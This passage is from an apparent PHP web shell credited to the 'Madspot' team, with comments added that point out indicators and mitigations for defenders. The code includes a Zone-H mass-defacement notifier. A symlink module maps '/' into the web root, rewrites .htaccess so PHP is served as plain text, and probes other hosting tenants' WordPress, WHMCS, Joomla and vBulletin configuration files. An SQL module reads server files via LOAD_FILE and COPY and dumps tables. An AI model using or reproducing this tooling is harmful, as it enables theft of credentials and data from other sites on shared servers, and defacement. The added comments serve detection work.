1229  madfooter();
1230 }
1231 function ZoneH($url, $hacker, $hackmode,$reson, $site )
1232 {
    // Sends one HTTP POST to $url through the curl extension and returns the
    // response body (CURLOPT_RETURNTRANSFER), following redirects.
    // The form body carries four fields: defacer, domain1, hackmode and reason.
    // The values are concatenated as-is, without URL encoding.
    // Defender note: when called from madzoneh() this is an outbound request
    // from the web server to a defacement-archive site, which proxy or egress
    // logs can reveal.
1233    $k = curl_init();
1234    curl_setopt($k, CURLOPT_URL, $url);
1235    curl_setopt($k,CURLOPT_POST,true);
1236    curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
1237    curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
1238    curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
1239    $kubra = curl_exec($k);
1240    curl_close($k);
1241    return $kubra;
1242 }
1243 function madzoneh()
1244 {
     // Defacement-notification panel: submits a list of domains to
     // http://zone-h.org/notify/single, one POST per domain, via ZoneH().
     // Reads $_POST['p1'] (notifier name), $_POST['p2'] (hackmode code) and
     // $_POST['p3'] (newline-separated domains).
     // Defender note: requests from a web server to that notify endpoint are an
     // indicator that this panel was used. The "Defaced !" line is printed for
     // every entry regardless of the response, because ZoneH()'s return value is
     // discarded.
1245     madhead();
     // Only warns when the curl extension is missing; execution continues.
1246     if(!function_exists('curl_version'))
1247     {
1248         echo "<pre class=ml1 style='margin-top:5px'><center><font color=red>PHP CURL NOT EXIT</font></center></pre>";
1249     }
1250     echo "<div class=header><center><br>";
     // The second <select> in this form has no name and the onSubmit handler does
     // not pass it on, so the reason shown in the UI is never submitted; $neden
     // below is fixed to "Not available".
1251     echo '<h3><span>|ZONE-H MASS DEFACER |</span></h3>
1252     <form  onSubmit="g(null,null,this.defacer.value,this.hackmode.value,this.domain.value);return false;" >
1253     <span>| Notifier |</span><br>
1254 <input type="text" name=defacer size="40" value="Attacker" /><br>
1255 <select name=hackmode>
1256 <option >--------SELECT--------</option>
1257 <option value="1">known vulnerability (i.e. unpatched system)</option>
1258 <option value="2" >undisclosed (new) vulnerability</option>
1259 <option value="3" >configuration / admin. mistake</option>
1260 <option value="4" >brute force attack</option>
1261 <option value="5" >social engineering</option>
1262 <option value="6" >Web Server intrusion</option>
1263 <option value="7" >Web Server external module intrusion</option>
1264 <option value="8" >Mail Server intrusion</option>
1265 <option value="9" >FTP Server intrusion</option>
1266 <option value="10" >SSH Server intrusion</option>
1267 <option value="11" >Telnet Server intrusion</option>
1268 <option value="12" >RPC Server intrusion</option>
1269 <option value="13" >Shares misconfiguration</option>
1270 <option value="14" >Other Server intrusion</option>
1271 <option value="15" >SQL Injection</option>
1272 <option value="16" >URL Poisoning</option>
1273 <option value="17" >File Inclusion</option>
1274 <option value="18" >Other Web Application bug</option>
1275 <option value="19" >Remote administrative panel access bruteforcing</option>
1276 <option value="20" >Remote administrative panel access password guessing</option>
1277 <option value="21" >Remote administrative panel access social engineering</option>
1278 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
1279 <option value="23" >Access credentials through Man In the Middle attack</option>
1280 <option value="24" >Remote service password guessing</option>
1281 <option value="25" >Remote service password bruteforce</option>
1282 <option value="26" >Rerouting after attacking the Firewall</option>
1283 <option value="27" >Rerouting after attacking the Router</option>
1284 <option value="28" >DNS attack through social engineering</option>
1285 <option value="29" >DNS attack through cache poisoning</option>
1286 <option value="30" >Not available</option>
1287 </select><br>
1288 <select  >
1289 <option >Not available</option>
1290 <option value="1" >Heh...just for fun!</option>
1291 <option value="2" >Revenge against that website</option>
1292 <option value="3" >Political reasons</option>
1293 <option value="4" >As a challenge</option>
1294 <option value="5" >I just want to be the best defacer</option>
1295 <option value="6" >Patriotism</option>
1296 <option value="7" >Not available</option>
1297 </select><br>
1298 <textarea name=domain cols="50" rows="15">List Of Domains</textarea>
1299 <br>
1300 <input type="submit" value=">>" /></form>';
1301 if(isset($_POST['p1']) && isset($_POST['p2']))
1302 {
1303     $hacker =$_POST['p1'];
1304     $method =$_POST['p2'];
1305     $neden ="Not available";
1306     $site =$_POST['p3'];
1307    $i = 0;
     // One entry per line of p3; entries that do not start with "http" get an
     // "http://" prefix. Entries are echoed back without HTML escaping.
1308    $sites = explode("\n", $site);
1309    echo "<pre class=ml1 style='margin-top:5px'>";
1310    while($i < count($sites)) 
1311    {
1312    if(substr($sites[$i], 0, 4) != "http") 
1313    {
1314            $sites[$i] = "http://".$sites[$i];
1315    }
1316    ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
1317    echo "Site : ".$sites[$i]." Defaced !<br>";
1318    ++$i;
1319    }
1320      
     // The next line is a bare string expression with no echo: nothing is output,
     // so the <pre> opened above is never closed.
1321     "Sending Sites To Zone-H Has Been Completed Successfully !! </pre>";
1322 }
1323 echo "</div>";
1324 madfooter();
1325     
1326 }
1327 function madspot()
1328 {
     // Credits banner only: prints a fixed ASCII-art block between madhead() and
     // madfooter(); no request data is read here.
     // NOTE(review): the <img ... class="wp-smiley"> tags inside the art look like
     // the hosting blog's smiley conversion of ":|" rather than original source
     // text, so this listing is presumably not a byte-exact copy of the file and
     // hashes computed from it should not be expected to match real samples.
     // The names and the contact URL in the banner are stable strings that
     // content-based detection rules can key on.
1329     madhead();
1330     echo "<div class=header>";
1331     echo "<pre>
1332     
1333                            |`-:_
1334   ,----....____            |    `+.                                                           
1335  (             ````----....|___   |
1336   \     _                      ````----....____
1337    \    _)  Coded By: Ikram Ali                ```---.._                       
1338     \                                                   \ 
1339   )`.\  )`.   )`.   )`.   )`.   )`.   )`.   )`.   )`.   )`.   )hh
1340 -'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `
1341    Madspot is a Team of professional Ethical Hackers From Pakistan.
1342    We have Years of  Experience in  Security, Penetration & Coding 
1343    And can Break and Secure.
1344    
1345    Version 1.0
1346    
1347    Contact : http://www.madspot.net
1348    
1349    if you found bug contact our team 
1350    
1351    
1352 
1353 
1354               .=''=.             
1355              / _  _ \
1356             |  d  b  |
1357             \   /\   / 
1358            ,/'-=\/=-'\,
1359           / /        \ \     -----------------------------
1360          | / Zahid    \ |    Madspot Digital Security Team
1361          \/ \ Rasheed/ \/    -----------------------------
1362              '.    .'
1363              _|`~~`|_
1364              /|\  /|\    
1365   
1366        .- <O> -.        .-====-.      ,-------.      .-=<>=-.
1367    /_-\'''/-_\      / / '' \ \     |,-----.|     /__----__\
1368   |/  o) (o  \|    | | ')(' | |   /,'-----'.\   |/ (')(') \|
1369    \   ._.   /      \ \    / /   {_/(') (')\_}   \   __   /
1370    ,>-_,,,_-<.       >'=jf='<     `.   _   .'    ,'--__--'.
1371  / Waqar.Khan  \    /        \     /'-___-'\    /    <img src="/wp-includes/images/smilies/icon_neutral.gif" alt=":|" class="wp-smiley" />    \
1372 (_)     .     (_)  /  Ikram   \   / M-Usman \  (_)   <img src="/wp-includes/images/smilies/icon_neutral.gif" alt=":|" class="wp-smiley" />   (_)
1373  \_-----'____--/  (_)  Ali   (_) (_)_______(_)   |___:|____|
1374   \___________/     |________|     \_______/     | Afrasiab|
1375 
1376 
1377   
1378   
1379   
1380     </pre></div>";
1381     madfooter();
1382     
1383     }
1384     
1385 function madsymlink()
1386 {
     // Shared-hosting symlink panel with three views, selected by $_POST['p1']
     // ('website'), $_POST['p2'] ('whole') and $_POST['p3'] ('config'). All three
     // enumerate hosted domains from /etc/named.conf and map each domain to an
     // account name through the owner of /etc/valiases/<domain>.
     // Defender note: indicators are a new "sym" directory in the web root that
     // contains a symlink named "root" pointing at "/" and an .htaccess serving
     // .php as text/plain, plus bursts of local HTTP requests for other tenants'
     // configuration files. Mitigations: do not let .htaccess re-enable symlink
     // following (Apache AllowOverride / Options SymLinksIfOwnerMatch), keep
     // /etc/named.conf and /etc/valiases unreadable to web users, isolate
     // tenants' home directories, and deny symlink() in PHP where possible.
     // The single-argument eregi() calls used below were removed in PHP 7.
1387     madhead();
1388     
     // Base URL of the directory this script is served from: the request URL with
     // its last path segment blanked out.
1389 $IIIIIIIIIIIl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1390 $IIIIIIIIIII1=explode('/',$IIIIIIIIIIIl );
1391 $IIIIIIIIIIIl =str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1)-1],'',$IIIIIIIIIIIl );  
1392     
1393     
1394     
1395 
1396    echo '<div class=header><script>p1_=p2_=p3_="";</script><br><center><h3><a href=# onclick="g(\'symlink\',null,\'website\',null)">| Domains | </a><a href=# onclick="g(\'symlink\',null,null,\'whole\')">| Whole Server Symlink | </a><a href=# onclick="g(\'symlink\',null,null,null,\'config\')">| Config PHP symlink | </a></h3></center>';
1397     
     // View 'website': read-only listing of domain -> owning account. When
     // /etc/named.conf cannot be read a message is printed, but the foreach below
     // still runs on the failed result.
1398     if(isset($_POST['p1']) && $_POST['p1']=='website')
1399     {
1400         echo "<center>";
1401         $d0mains = @file("/etc/named.conf");
1402         if(!$d0mains){ echo "<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; }
1403 
1404  
1405 
1406 echo "<table align=center class='main'  border=0  >
1407 
1408 <tr bgcolor=Red><td>Count</td><td>domains</td><td>users</td></tr>";
1409 $count=1;
1410 foreach($d0mains as $d0main){
1411 
1412 if(@eregi("zone",$d0main)){
1413 
1414 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1415 
1416 flush();
1417 
1418 if(strlen(trim($domains[1][0])) > 2){
1419 
1420 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1421 
1422 echo "<tr><td>".$count."</td><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();
1423 $count++;
1424 }}}
1425 echo "</center></table>"; 
1426  }
1427  
     // View 'whole': creates sym/ (mode 0777), writes sym/.htaccess so that .php
     // and .html are served as plain text, symlinks "/" to sym/root, then prints
     // one link per domain pointing at sym/root/home/<account>/public_html.
1428  if(isset($_POST['p2']) && $_POST['p2']=='whole')
1429  {
1430     
1431     
1432     @set_time_limit(0);
1433     
1434     echo "<center>";
1435     
1436   
1437         
1438 @mkdir('sym',0777);
1439 $IIIIIIIIIIl1  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1440 $IIIIIIIIII1I =@fopen ('sym/.htaccess','w');
1441 fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1);
1442 @symlink('/','sym/root');
     // basename() is applied to the literal string '_FILE_', not the __FILE__
     // constant; the result does not appear to be used in this function.
1443 $IIIIIIIIIlIl = basename('_FILE_');
1444     
1445     
1446 $IIIIIIIIIllI = @file('/etc/named.conf');
1447 if(!$IIIIIIIIIllI)
1448 {
1449 echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; 
1450 }
1451 else
1452 {
1453 echo "<table align='center' width='40%' class='main'><td>Domains</td><td>Users</td><td>symlink </td>";
1454 foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
1455 if(@eregi('zone',$IIIIIIIIIll1)){
1456 preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
1457 flush();
1458 if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
1459 $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
1460 $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
1461 @symlink('/','sym/root');
1462 $IIIIIIII1I1l = $IIIIIIIIIl11[1][0];
     // Domains matching the patterns '\.ir' or '\.il' are rendered in red.
1463 $IIIIIIII1I11 = '\.ir';
1464 $IIIIIIII1lII = '\.il';
1465 if (@eregi("$IIIIIIII1I11",$IIIIIIIIIl11[1][0]) or @eregi("$IIIIIIII1lII",$IIIIIIIIIl11[1][0]) )
1466 {
1467 $IIIIIIII1I1l = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$IIIIIIIIIl11[1][0].'</div>';
1468 }
1469 echo "
1470 <tr>
1471 
1472 <td>
1473 <a target='_blank' href=http://www.".$IIIIIIIIIl11[1][0].'/>'.$IIIIIIII1I1l.' </a>
1474 </td>
1475 
1476 <td>
1477 '.$IIIIIIIII1I1['name']."
1478 </td>
1479 
1480 <td>
1481 <a href='sym/root/home/".$IIIIIIIII1I1['name']."/public_html' target='_blank'>symlink </a>
1482 </td>
1483 
1484 
1485 </tr>";
1486 flush();
1487 }
1488 }
1489 }
1490 }
1491     
1492 echo "</center></table>";    
1493     
1494  }
1495  
1496  
1497  
     // View 'config': same sym/ setup as above, then for every domain requests a
     // fixed list of application configuration paths through the symlink with
     // get_headers() and lists the first one whose status line contains "200",
     // labelled by application (Wordpress, WHMCS, Joomla, vBulletin). Domains
     // with no hit are skipped via continue.
     // NOTE(review): "strpos(...) == true" compares a numeric offset loosely with
     // true; the path on the line numbered 1547 has no "/" before "public_html".
1498  if(isset($_POST['p3']) && $_POST['p3']=='config')
1499  
1500  
1501  {
1502   echo "<center>";
1503 @mkdir('sym',0777);
1504 $IIIIIIIIIIl1  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1505 $IIIIIIIIII1I =@fopen ('sym/.htaccess','w');
1506 @fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1);
1507 @symlink('/','sym/root');
1508 $IIIIIIIIIlIl = basename('_FILE_');
1509   
1510    
1511    $IIIIIIIIIllI = @file('/etc/named.conf');
1512 if(!$IIIIIIIIIllI)
1513 {
1514 echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
1515 }
1516 else
1517 {
1518 echo "
1519 <table align='center' width='40%' class='main' ><td> Domains </td><td> Script </td>";
1520 foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
1521 if(@eregi('zone',$IIIIIIIIIll1)){
1522 preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
1523 flush();
1524 if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
1525 $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
1526 $IIIIIIIII1l1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/wp-config.php';
1527 $IIIIIIIII11I=get_headers($IIIIIIIII1l1);
1528 $IIIIIIIII11l=$IIIIIIIII11I[0];
1529 $IIIIIIIII111=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/blog/wp-config.php';
1530 $IIIIIIIIlIII=get_headers($IIIIIIIII111);
1531 $IIIIIIIIlIIl=$IIIIIIIIlIII[0];
1532 $IIIIIIIIlII1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/configuration.php';
1533 $IIIIIIIIlIlI=get_headers($IIIIIIIIlII1);
1534 $IIIIIIIIlIll=$IIIIIIIIlIlI[0];
1535 $IIIIIIIIlIl1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/joomla/configuration.php';
1536 $IIIIIIIIlI1I=get_headers($IIIIIIIIlIl1);
1537 $IIIIIIIIlI1l=$IIIIIIIIlI1I[0];
1538 $IIIIIIIIlI11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/includes/config.php';
1539 $IIIIIIIIllII=get_headers($IIIIIIIIlI11);
1540 $IIIIIIIIllIl=$IIIIIIIIllII[0];
1541 $IIIIIIIIllI1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/vb/includes/config.php';
1542 $IIIIIIIIlllI=get_headers($IIIIIIIIllI1);
1543 $IIIIIIIIllll=$IIIIIIIIlllI[0];
1544 $IIIIIIIIlll1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/forum/includes/config.php';
1545 $IIIIIIIIll1I=get_headers($IIIIIIIIlll1);
1546 $IIIIIIIIll1l=$IIIIIIIIll1I[0];
1547 $IIIIIIIIll11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'public_html/clients/configuration.php';
1548 $IIIIIIIIl1II=get_headers($IIIIIIIIll11);
1549 $IIIIIIIIl1Il=$IIIIIIIIl1II[0];
1550 $IIIIIIIIl1I1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/support/configuration.php';
1551 $IIIIIIIIl1II=get_headers($IIIIIIIIl1I1);
1552 $IIIIIIIIl1lI=$IIIIIIIIl1II[0];
1553 $IIIIIIIIl1ll=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
1554 $IIIIIIIIl1l1=get_headers($IIIIIIIIl1ll);
1555 $IIIIIIIIl11I=$IIIIIIIIl1l1[0];
1556 $IIIIIIIIl11l=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/submitticket.php';
1557 $IIIIIIIIl111=get_headers($IIIIIIIIl11l);
1558 $IIIIIIII1III=$IIIIIIIIl111[0];
1559 $IIIIIIII1IIl=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
1560 $IIIIIIII1II1=get_headers($IIIIIIII1IIl);
1561 $IIIIIIII1IlI=$IIIIIIII1II1[0];
1562 $IIIIIIII1Ill = strpos($IIIIIIIII11l,'200');
1563 $IIIIIIII1I1I='&nbsp;';
1564 if (strpos($IIIIIIIII11l,'200') == true )
1565 {
1566 $IIIIIIII1I1I="<a href='".$IIIIIIIII1l1."' target='_blank'>Wordpress</a>";
1567 }
1568 elseif (strpos($IIIIIIIIlIIl,'200') == true)
1569 {
1570 $IIIIIIII1I1I="<a href='".$IIIIIIIII111."' target='_blank'>Wordpress</a>";
1571 }
1572 elseif (strpos($IIIIIIIIlIll,'200')  == true and strpos($IIIIIIII1III,'200')  == true )
1573 {
1574 $IIIIIIII1I1I=" <a href='".$IIIIIIIIl11l."' target='_blank'>WHMCS</a>";
1575 }
1576 elseif (strpos($IIIIIIIIl1lI,'200')  == true)
1577 {
1578 $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1I1."' target='_blank'>WHMCS</a>";
1579 }
1580 elseif (strpos($IIIIIIIIl11I,'200')  == true)
1581 {
1582 $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1ll."' target='_blank'>WHMCS</a>";
1583 }
1584 elseif (strpos($IIIIIIIIlIll,'200')  == true)
1585 {
1586 $IIIIIIII1I1I=" <a href='".$IIIIIIIIlII1."' target='_blank'>Joomla</a>";
1587 }
1588 elseif (strpos($IIIIIIIIlI1l,'200')  == true)
1589 {
1590 $IIIIIIII1I1I=" <a href='".$IIIIIIIIlIl1."' target='_blank'>Joomla</a>";
1591 }
1592 elseif (strpos($IIIIIIIIllIl,'200')  == true)
1593 {
1594 $IIIIIIII1I1I=" <a href='".$IIIIIIIIlI11."' target='_blank'>vBulletin</a>";
1595 }
1596 elseif (strpos($IIIIIIIIllll,'200')  == true)
1597 {
1598 $IIIIIIII1I1I=" <a href='".$IIIIIIIIllI1."' target='_blank'>vBulletin</a>";
1599 }
1600 elseif (strpos($IIIIIIIIll1l,'200')  == true)
1601 {
1602 $IIIIIIII1I1I=" <a href='".$IIIIIIIIlll1."' target='_blank'>vBulletin</a>";
1603 }
1604 else
1605 {
1606 continue;
1607 }
1608 $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
1609 echo '<tr><td><a href=http://www.'.$IIIIIIIIIl11[1][0].'/>'.$IIIIIIIIIl11[1][0].'</a></td>
1610 <td>'.$IIIIIIII1I1I.'</td></tr>';flush();
1611 }
1612 }
1613 }
1614 }
1615 echo "</center></table>";   
1616     
1617  }
1618     
1619     echo "</div>";
1620     madfooter();
1621     
1622 }    
1623 
1624 
1625 function madsql()
1626 {
1627     
1628     
1629     class DbClass {
            // Minimal database wrapper: each method switches on $this->type and calls the
            // matching legacy mysql_* or pg_* function; for any other type the methods
            // below fall through to `return false`.
            // NOTE(defender): this class is the SQL module of a web shell. The mysql_*
            // functions it relies on were removed in PHP 7.0, so the 'mysql' branches only
            // run on older runtimes; the pg_* branches have no such limit.
            // Backend selector, expected to be 'mysql' or 'pgsql'.
1630        var $type;
            // Connection handle stored by connect(); false after a failed connect().
1631        var $link;
            // Result of the most recent query() call.
1632        var $res;
            // PHP 4-style constructor (method named after the class): records the backend type.
1633        function DbClass($type)    {
1634            $this->type = $type;
1635        }
            // Opens a connection and stores it in $this->link. Returns true on success,
            // false otherwise; the @ operator hides connection warnings.
            // mysql: $dbname is not used here (selectdb() picks the database afterwards);
            //        the 4th argument `true` asks mysql_connect() for a new link.
            // pgsql: $host may be "host:port"; the port defaults to 5432. The values are
            //        interpolated into the connection string without quoting.
1636        function connect($host, $user, $pass, $dbname){
1637            switch($this->type)  {
1638                case 'mysql':
1639                    if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1640                    break;
1641                case 'pgsql':
1642                    $host = explode(':', $host);
1643                    if(!$host[1]) $host[1]=5432;
1644                    if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1645                    break;
1646            }
1647            return false;
1648        }
            // Selects database $db. Only implemented for mysql; for pgsql this returns false
            // (there the database name is already part of connect()'s connection string).
1649        function selectdb($db) {
1650            switch($this->type)  {
1651                case 'mysql':
1652                    if (@mysql_select_db($db))return true;
1653                    break;
1654            }
1655            return false;
1656        }
            // Sends $str to the server unchanged and stores the result in $this->res.
            // Returns that result, or false for an unknown type.
            // The mysql branch passes no link argument, so mysql_query() uses the most
            // recently opened connection. The `break` after each `return` is unreachable.
1657        function query($str) {
1658            switch($this->type) {
1659                case 'mysql':
1660                    return $this->res = @mysql_query($str);
1661                    break;
1662                case 'pgsql':
1663                    return $this->res = @pg_query($this->link,$str);
1664                    break;
1665            }
1666            return false;
1667        }
            // Returns the next row as an associative array. Reads from the result passed
            // as the optional first argument, otherwise from $this->res.
1668        function fetch() {
1669            $res = func_num_args()?func_get_arg(0):$this->res;
1670            switch($this->type)  {
1671                case 'mysql':
1672                    return @mysql_fetch_assoc($res);
1673                    break;
1674                case 'pgsql':
1675                    return @pg_fetch_assoc($res);
1676                    break;
1677            }
1678            return false;
1679        }
            // Lists databases: SHOW databases (mysql) or the non-template rows of
            // pg_database (pgsql). Returns the query result.
1680        function listDbs() {
1681            switch($this->type)  {
1682                case 'mysql':
1683                         return $this->query("SHOW databases");
1684                break;
1685                case 'pgsql':
1686                    return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
1687                break;
1688            }
1689            return false;
1690        }
            // Lists tables: SHOW TABLES (mysql) or information_schema.tables minus the
            // information_schema and pg_catalog schemas (pgsql). Returns the query result.
1691        function listTables() {
1692            switch($this->type)  {
1693                case 'mysql':
1694                    return $this->res = $this->query('SHOW TABLES');
1695                break;
1696                case 'pgsql':
1697                    return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
1698                break;
1699            }
1700            return false;
1701        }
            // Returns the last error message reported by the active extension.
1702        function error() {
1703            switch($this->type)  {
1704                case 'mysql':
1705                    return @mysql_error();
1706                break;
1707                case 'pgsql':
1708                    return @pg_last_error();
1709                break;
1710            }
1711            return false;
1712        }
            // Sets the client character set. On mysql without mysql_set_charset() the
            // fallback issues `SET CHARSET <str>` and then falls through to `return false`,
            // so a false return does not by itself mean the charset was not applied.
1713        function setCharset($str) {
1714            switch($this->type)  {
1715                case 'mysql':
1716                    if(function_exists('mysql_set_charset'))
1717                        return @mysql_set_charset($str, $this->link);
1718                    else
1719                        $this->query('SET CHARSET '.$str);
1720                    break;
1721                case 'pgsql':
1722                    return @pg_set_client_encoding($this->link, $str);
1723                    break;
1724            }
1725            return false;
1726        }
            // Reads a file from the DATABASE SERVER's filesystem through the SQL engine and
            // returns it under the key 'file'.
            // mysql: SELECT LOAD_FILE(...) and return the fetched row.
            // pgsql: create table `wso2`, COPY the file into it, collect the rows, drop the
            //        table. addslashes() is the only escaping applied to the path.
            // NOTE(defender): this is a file read performed with the database service's
            // privileges. Mitigations: do not grant the MySQL FILE privilege to application
            // accounts and restrict secure_file_priv; in PostgreSQL, COPY ... FROM a server
            // file needs superuser or the pg_read_server_files role, so keep application
            // roles out of both. A short-lived table named `wso2`, or LOAD_FILE() calls from
            // a web application account, are worth alerting on in database logs.
1727        function loadFile($str) {
1728            switch($this->type)  {
1729                case 'mysql':
1730                    return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
1731                break;
1732                case 'pgsql':
1733                    $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
1734                    $r=array();
1735                    while($i=$this->fetch())
1736                        $r[] = $i['file'];
1737                    $this->query('drop table wso2');
1738                    return array('file'=>implode("\n",$r));
1739                break;
1740            }
1741            return false;
1742        }
            // Writes an SQL dump of $table to the open handle $fp, or echoes it when $fp is
            // false. Always returns false.
            // mysql: emits the SHOW CREATE TABLE text, then one multi-row INSERT statement.
            // pgsql: emits one INSERT per row with every value quoted; no CREATE TABLE.
            // $table is concatenated into the SQL text unescaped in both branches.
1743        function dump($table, $fp = false) {
1744            switch($this->type)  {
1745                case 'mysql':
1746                    $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1747                    $create = mysql_fetch_array($res);
1748                    $sql = $create[1].";\n";
1749                     if($fp) fwrite($fp, $sql); else echo($sql);
1750                    $this->query('SELECT * FROM `'.$table.'`');
                        // $head is true until the first row has been written (it selects the
                        // "INSERT INTO ... VALUES" prefix versus a ",(...)" continuation).
1751                     $head = true;
1752                    while($item = $this->fetch()) {
1753                        $columns = array();
1754                        foreach($item as $k=>$v) {
                                // Loose comparison: an empty string also equals null here and
                                // is written as NULL.
1755                             if($v == null)
1756                                 $item[$k] = "NULL";
1757                             elseif(is_numeric($v))
1758                                 $item[$k] = $v;
1759                             else
1760                                 $item[$k] = "'".@mysql_real_escape_string($v)."'";
1761                            $columns[] = "`".$k."`";
1762                        }
1763                         if($head) {
1764                             $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
1765                             $head = false;
1766                         } else
1767                             $sql = "\n\t,(".implode(", ", $item).')';
1768                         if($fp) fwrite($fp, $sql); else echo($sql);
1769                    }
                        // Terminate the INSERT only if at least one row was written.
1770                     if(!$head)
1771                         if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
1772                break;
1773                case 'pgsql':
1774                    $this->query('SELECT * FROM '.$table);
1775                    while($item = $this->fetch()) {
1776                        $columns = array();
1777                        foreach($item as $k=>$v) {
1778                            $item[$k] = "'".addslashes($v)."'";
1779                            $columns[] = $k;
1780                        }
1781                         $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1782                         if($fp) fwrite($fp, $sql); else echo($sql);
1783                    }
1784                break;
1785            }
1786            return false;
1787        }
1788    };
1789    $db = new DbClass($_POST['type']);
        // NOTE(defender): request handler of the shell's SQL module. Everything below is
        // driven by POST fields: type, sql_host, sql_login, sql_pass, sql_base, charset,
        // p1 (mode: query / select / loadfile), p2, p3, tbl[], file, sql_count; the form it
        // renders posts a=Sql. Because these travel in the request body, a standard access
        // log shows only a POST to the script; request-body logging or WAF inspection is
        // needed to see them.
        // Mode p2=download: dump the tables listed in tbl[].
1790    if(@$_POST['p2']=='download') {
1791        $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1792        $db->selectdb($_POST['sql_base']);
            // Map the page charset name to the database client charset name.
1793         switch($_POST['charset']) {
1794             case "Windows-1251": $db->setCharset('cp1251'); break;
1795             case "UTF-8": $db->setCharset('utf8'); break;
1796             case "KOI8-R": $db->setCharset('koi8r'); break;
1797             case "KOI8-U": $db->setCharset('koi8u'); break;
1798             case "cp866": $db->setCharset('cp866'); break;
1799         }
             // No target path given: send the dump to the client as a gzip-buffered
             // attachment named dump.sql, then stop.
1800         if(empty($_POST['file'])) {
1801             ob_start("ob_gzhandler", 4096);
1802             header("Content-Disposition: attachment; filename=dump.sql");
1803             header("Content-Type: text/plain");
1804             foreach($_POST['tbl'] as $v)
1805                $db->dump($v);
1806             exit;
             // Otherwise write the dump to the request-supplied path on the web server.
             // NOTE(defender): the form further down pre-fills this path with 'dump.sql',
             // so an unexpected dump.sql in a web-served directory is an indicator to
             // look for during triage.
1807         } elseif($fp = @fopen($_POST['file'], 'w')) {
1808             foreach($_POST['tbl'] as $v)
1809                 $db->dump($v, $fp);
1810             fclose($fp);
1811             unset($_POST['p2']);
1812         } else
1813             die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1814    }
        // madhead() is defined elsewhere in the file (not visible in this section).
1815    madhead();
        // Connection form. Host, login and password are echoed back into the page
        // HTML-escaped; the charset field is echoed without escaping.
1816    echo "
1817 <div class=header>
1818 <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
1819 <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
